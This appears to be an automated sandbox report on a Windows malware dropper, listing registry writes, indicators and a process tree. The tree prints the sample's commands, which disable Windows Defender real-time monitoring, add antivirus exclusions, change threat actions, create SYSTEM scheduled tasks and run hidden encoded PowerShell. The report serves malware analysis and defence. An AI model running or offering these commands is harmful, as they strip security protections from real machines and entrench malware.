a2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 ukITios.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 ukITios.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0 ukITios.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 2708 powershell.exe 608 powershell.exe 608 powershell.exe 608 powershell.exe 2052 powershell.EXE 2052 powershell.EXE 2052 powershell.EXE 2220 powershell.EXE 2220 powershell.EXE 2220 powershell.EXE 2664 powershell.exe 1928 powershell.EXE 1928 powershell.EXE 1928 powershell.EXE 2420 powershell.exe 2420 powershell.exe 2420 powershell.exe 1580 powershell.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 2124 powershell.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe 328 ukITios.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2492 powershell.exe Token: SeDebugPrivilege 2708 powershell.exe Token: SeIncreaseQuotaPrivilege 1188 WMIC.exe Token: SeSecurityPrivilege 1188 WMIC.exe Token: SeTakeOwnershipPrivilege 1188 WMIC.exe Token: SeLoadDriverPrivilege 1188 WMIC.exe Token: SeSystemProfilePrivilege 1188 WMIC.exe Token: SeSystemtimePrivilege 1188 WMIC.exe Token: SeProfSingleProcessPrivilege 1188 WMIC.exe Token: SeIncBasePriorityPrivilege 1188 WMIC.exe Token: SeCreatePagefilePrivilege 1188 WMIC.exe Token: SeBackupPrivilege 1188 WMIC.exe Token: SeRestorePrivilege 1188 WMIC.exe Token: SeShutdownPrivilege 1188 WMIC.exe Token: SeDebugPrivilege 1188 WMIC.exe Token: SeSystemEnvironmentPrivilege 1188 WMIC.exe Token: SeRemoteShutdownPrivilege 1188 WMIC.exe Token: SeUndockPrivilege 1188 WMIC.exe Token: SeManageVolumePrivilege 1188 WMIC.exe Token: 33 1188 WMIC.exe Token: 34 1188 WMIC.exe Token: 35 1188 WMIC.exe Token: SeDebugPrivilege 608 powershell.exe Token: SeDebugPrivilege 2052 powershell.EXE Token: SeDebugPrivilege 2220 powershell.EXE Token: SeDebugPrivilege 2664 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2100 WMIC.exe Token: SeIncreaseQuotaPrivilege 2100 WMIC.exe Token: SeSecurityPrivilege 2100 WMIC.exe Token: SeTakeOwnershipPrivilege 2100 WMIC.exe Token: SeLoadDriverPrivilege 2100 WMIC.exe Token: SeSystemtimePrivilege 2100 WMIC.exe Token: SeBackupPrivilege 2100 WMIC.exe Token: SeRestorePrivilege 2100 WMIC.exe Token: SeShutdownPrivilege 2100 WMIC.exe Token: SeSystemEnvironmentPrivilege 2100 WMIC.exe Token: SeUndockPrivilege 2100 WMIC.exe Token: SeManageVolumePrivilege 2100 WMIC.exe Token: SeDebugPrivilege 1928 powershell.EXE Token: SeDebugPrivilege 2420 powershell.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1768 WMIC.exe Token: SeIncreaseQuotaPrivilege 1768 WMIC.exe Token: SeSecurityPrivilege 1768 WMIC.exe Token: SeTakeOwnershipPrivilege 1768 WMIC.exe Token: SeLoadDriverPrivilege 1768 WMIC.exe Token: SeSystemtimePrivilege 1768 WMIC.exe Token: SeBackupPrivilege 1768 WMIC.exe Token: SeRestorePrivilege 1768 WMIC.exe Token: SeShutdownPrivilege 1768 WMIC.exe Token: SeSystemEnvironmentPrivilege 1768 WMIC.exe Token: SeUndockPrivilege 1768 WMIC.exe Token: SeManageVolumePrivilege 1768 WMIC.exe Token: SeDebugPrivilege 2124 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2160 WMIC.exe Token: SeIncreaseQuotaPrivilege 2160 WMIC.exe Token: SeSecurityPrivilege 2160 WMIC.exe Token: SeTakeOwnershipPrivilege 2160 WMIC.exe Token: SeLoadDriverPrivilege 2160 WMIC.exe Token: SeSystemtimePrivilege 2160 WMIC.exe Token: SeBackupPrivilege 2160 WMIC.exe Token: SeRestorePrivilege 2160 WMIC.exe Token: SeShutdownPrivilege 2160 WMIC.exe Token: SeSystemEnvironmentPrivilege 2160 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1936 wrote to memory of 2140 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 28 PID 1936 wrote to memory of 2140 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 28 PID 1936 wrote to memory of 2140 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 28 PID 1936 wrote to memory of 2140 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 28 PID 1936 wrote to memory of 2140 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 28 PID 1936 wrote to memory of 2140 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 28 PID 1936 wrote to memory of 2140 1936 36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe 28 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2140 wrote to memory of 2120 2140 Install.exe 29 PID 2120 wrote to memory of 2656 2120 Install.exe 30 PID 2120 wrote to memory of 2656 2120 Install.exe 30 PID 2120 wrote to memory of 2656 2120 Install.exe 30 PID 2120 wrote to memory of 2656 2120 Install.exe 30 PID 2120 wrote to memory of 2656 2120 Install.exe 30 PID 2120 wrote to memory of 2656 2120 Install.exe 30 PID 2120 wrote to memory of 2656 2120 Install.exe 30 PID 2656 wrote to memory of 2748 2656 cmd.exe 32 PID 2656 wrote to memory of 2748 2656 cmd.exe 32 PID 2656 wrote to memory of 2748 2656 cmd.exe 32 PID 2656 wrote to memory of 2748 2656 cmd.exe 32 PID 2656 wrote to memory of 2748 2656 cmd.exe 32 PID 2656 wrote to memory of 2748 2656 cmd.exe 32 PID 2656 wrote to memory of 2748 2656 cmd.exe 32 PID 2748 wrote to memory of 2756 2748 forfiles.exe 33 PID 2748 wrote to memory of 2756 2748 forfiles.exe 33 PID 2748 wrote to memory of 2756 2748 forfiles.exe 33 PID 2748 wrote to memory of 2756 2748 forfiles.exe 33 PID 2748 wrote to memory of 2756 2748 forfiles.exe 33 PID 2748 wrote to memory of 2756 2748 forfiles.exe 33 PID 2748 wrote to memory of 2756 2748 forfiles.exe 33 PID 2756 wrote to memory of 2620 2756 cmd.exe 108 PID 2756 wrote to memory of 2620 2756 cmd.exe 108 PID 2756 wrote to memory of 2620 2756 cmd.exe 108 PID 2756 wrote to memory of 2620 2756 cmd.exe 108 PID 2756 wrote to memory of 2620 2756 cmd.exe 108 PID 2756 wrote to memory of 2620 2756 cmd.exe 108 PID 2756 wrote to memory of 2620 2756 cmd.exe 108 PID 2656 wrote to memory of 2992 2656 cmd.exe 35 PID 2656 wrote to memory of 2992 2656 cmd.exe 35 PID 2656 wrote to memory of 2992 2656 cmd.exe 35 PID 2656 wrote to memory of 2992 2656 cmd.exe 35 PID 2656 wrote to memory of 2992 2656 cmd.exe 35 PID 2656 wrote to memory of 2992 2656 cmd.exe 35 PID 2656 wrote to memory of 2992 2656 cmd.exe 35 PID 2992 wrote to memory of 2980 2992 forfiles.exe 36 PID 2992 wrote to memory of 2980 2992 forfiles.exe 36 PID 2992 wrote to memory of 2980 2992 forfiles.exe 36 PID 2992 wrote to memory of 2980 2992 forfiles.exe 36 PID 2992 wrote to memory of 2980 2992 forfiles.exe 36 PID 2992 wrote to memory of 2980 2992 forfiles.exe 36 PID 2992 wrote to memory of 2980 2992 forfiles.exe 36 PID 2980 wrote to memory of 2824 2980 cmd.exe 37 PID 2980 wrote to memory of 2824 2980 cmd.exe 37 PID 2980 wrote to memory of 2824 2980 cmd.exe 37 PID 2980 wrote to memory of 2824 2980 cmd.exe 37 PID 2980 wrote to memory of 2824 2980 cmd.exe 37 PID 2980 wrote to memory of 2824 2980 cmd.exe 37 PID 2980 wrote to memory of 2824 2980 cmd.exe 37 PID 2656 wrote to memory of 2828 2656 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe"C:\Users\Admin\AppData\Local\Temp\36406ab959b6716803de0a86a73d38e1921e3908282db353fcfc5a395880eebd.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1936 -
C:\Users\Admin\AppData\Local\Temp\7zS9A2.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2140 -
C:\Users\Admin\AppData\Local\Temp\7zSB95.tmp\Install.exe.\Install.exe /RdidR "385115" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵
- Suspicious use of WriteProcessMemory
PID:2656 -
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2756 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵PID:2620
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"5⤵
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵
- Suspicious use of WriteProcessMemory
PID:2980 -
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵PID:2824
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"5⤵PID:2828
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:2476
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵PID:1648
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"5⤵PID:2832
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2772
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵PID:2628
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵PID:1928
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵PID:2496
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2492 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force8⤵PID:2764
-
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵PID:2888
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵PID:2684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2708 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "btZaCbGShXZoJDfvCg" /SC once /ST 01:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\mLoBrhO.exe\" PP /KwkdidxzVe 385115 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2736
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn btZaCbGShXZoJDfvCg"4⤵PID:2920
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn btZaCbGShXZoJDfvCg5⤵PID:2704
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn btZaCbGShXZoJDfvCg6⤵PID:2352
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2120 -s 6004⤵
- Loads dropped DLL
- Program crash
PID:2180
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {031EE83B-6961-44D7-B0E1-04827787C57C} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1788
-
C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\mLoBrhO.exeC:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy\DHAkwqCFFocyzXL\mLoBrhO.exe PP /KwkdidxzVe 385115 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:2308
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵PID:1952
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:2416
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵PID:1900
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"4⤵PID:1056
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:2400
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 66⤵PID:2448
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"4⤵PID:2452
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:1228
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 66⤵PID:1556
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"4⤵PID:1112
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2316
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 66⤵PID:2320
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"4⤵PID:3004
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵PID:540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:608 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force7⤵PID:1344
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYIfPLWca" /SC once /ST 00:52:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gYIfPLWca"3⤵PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYIfPLWca"3⤵PID:2372
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:2176
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:2388
-
